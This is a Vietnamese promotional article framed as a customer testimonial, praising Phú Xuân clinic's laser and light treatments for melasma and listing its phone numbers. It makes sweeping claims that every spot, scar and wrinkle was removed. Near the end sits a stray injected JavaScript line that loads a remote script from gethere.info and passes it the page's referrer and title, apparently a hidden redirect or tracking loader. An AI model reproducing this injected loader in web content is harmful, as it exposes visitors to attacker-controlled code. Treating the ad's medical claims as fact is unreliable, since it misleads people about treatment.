Thu Hương – Chia sẻ kinh nghiệm trị nám của bản thân

3

Nám da dần trở nên phổ biến do nhiều nguyên nhân (thay đổi nội tiết tố, căng thẳng mệt mỏi, ánh nắng mặt trời, lão hóa…). Vì thế, trên các diễn đàn, có không ít bài viết đã chia sẻ kinh nghiệm trị nám từ chính những người trong cuộc. Sau đây, chúng tôi xin trích dẫn một vài chia sẻ bổ ích của chị Thu Hương ở Lào Cai.

Xem thêm tại đây:

Tôi làm kế toán trưởng cho một công ty nước ngoài. Công việc bận rộn và đặc biệt là thường xuyên đi công tác khiến tôi trở nên kiệt sức, làn da dần thâm sạm và đầy vẻ mệt mỏi, già nua xấu xí.

Mặc dù biết nghỉ ngơi không điều độ, ăn uống qua loa, cùng tính chất công việc căng thẳng, nhưng tôi không thể khắc phục được. Thay vào đó, tôi chăm chỉ dùng kem chống nắng hoặc kem dưỡng da, đồng thời sử dụng khá nhiều những sản phẩm chăm sóc da cao cấp với mong muốn cải thiện, ngăn chặn tình trạng xỉn màu và không mịn màng  của mình. Song, tôi đã gắn bó với chúng khá lâu và kết quả vẫn chẳng khá hơn là mấy.

Thu Hương - Chia sẻ kinh nghiệm trị nám của bản thân
Mệt mỏi, căng thẳng là nguyên nhân phát sinh nám trên da

Chính vì thế, tôi bắt đầu tìm kiếm kinh nghiệm trị nám từ các phương pháp thiên nhiên trên mạng internet và bắt đầu thực hiện trong mọi thời gian rảnh có thể khi đi công tác. Những biện pháp làm đẹp này vừa dễ kiếm, dễ tận dụng thời gian, lại tiết kiệm chi phí. Tuy nhiên, cách làm cũng hơi kỳ công, về lâu dài tôi cũng đành từ bỏ, không theo tới cùng được nên hiệu quả cải thiện da nám không đáng là bao.

Cuối cùng, nhờ sự giới thiệu của một đối tác và chính kinh nghiệm trị nám của họ bằng công nghệ cao tại Thẩm mỹ viện Phú Xuân, tôi đã thực sự bị thuyết phục và cảm thấy hài lòng với quyết định đúng đắn của mình.

Thu Hương - Chia sẻ kinh nghiệm trị nám của bản thân
Trị nám triệt để nhờ công nghệ thẩm mỹ cao tại Phú Xuân

Khi tới với Phú Xuân, tôi được các bác sĩ thăm khám và tư vấn miễn phí. Tình trạng nám đang gặp phải của tôi là nám hỗn hợp, các nốt nám vừa ăn sâu trong da và hình thành mảng lớn lan rộng trên bề mặt, nếu chỉ sử dụng các biện pháp thông thường sẽ vô tác dụng.

Do cơ địa tôi khá khó, cộng thêm việc bị nám hỗn hợp đã lâu nên quá trình trị liệu của tôi được tiến hành kết hợp của nhiều công nghệ đó là: Công nghệ Laser Yag trị nám sâu, công nghệ Peeling, ánh sáng E Light trị nám mảng và dược phẩm đặc trị nám của Thụy Sỹ. Và thật bất ngờ vì sau trị nám, những vết sạm, sẹo thâm và nếp nhăn nhỏ đều được loại bỏ hết. Làn da của tôi được tăng sinh collagen nhanh chóng và trở nên săn chắc, trẻ trung.

Thu Hương - Chia sẻ kinh nghiệm trị nám của bản thân
New Elight – công nghệ trị nám hỗn hợp tận gốc an toàn

Qua trải nghiệm công nghệ tại Phú Xuân, tôi thấy đây thực sự là cơ sở thẩm mỹ uy tín, có trang thiết bị hiện đại cùng các bác sĩ tay nghề cao, chuyên viên nhiệt tình, mang tới quá trình trị liệu nhẹ nhàng, an toàn và có cam kết bảo hành chất lượng dịch vụ.

Nếu bạn cũng đang gặp rắc rối về nám như tôi trước kia, hãy thu xếp thời gian tới trực tiếp Phú Xuân để được thăm khám và nghe bác sĩ ở đây tư vấn cụ thể. Hoặc có thể gọi điện trước tới số 0946817777 cũng được nghe các tư vấn viên giải đáp mọi thắc mắc cho bạn đấy.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Tư vấn 24/7: 094 681 7777 - 0125 443 7777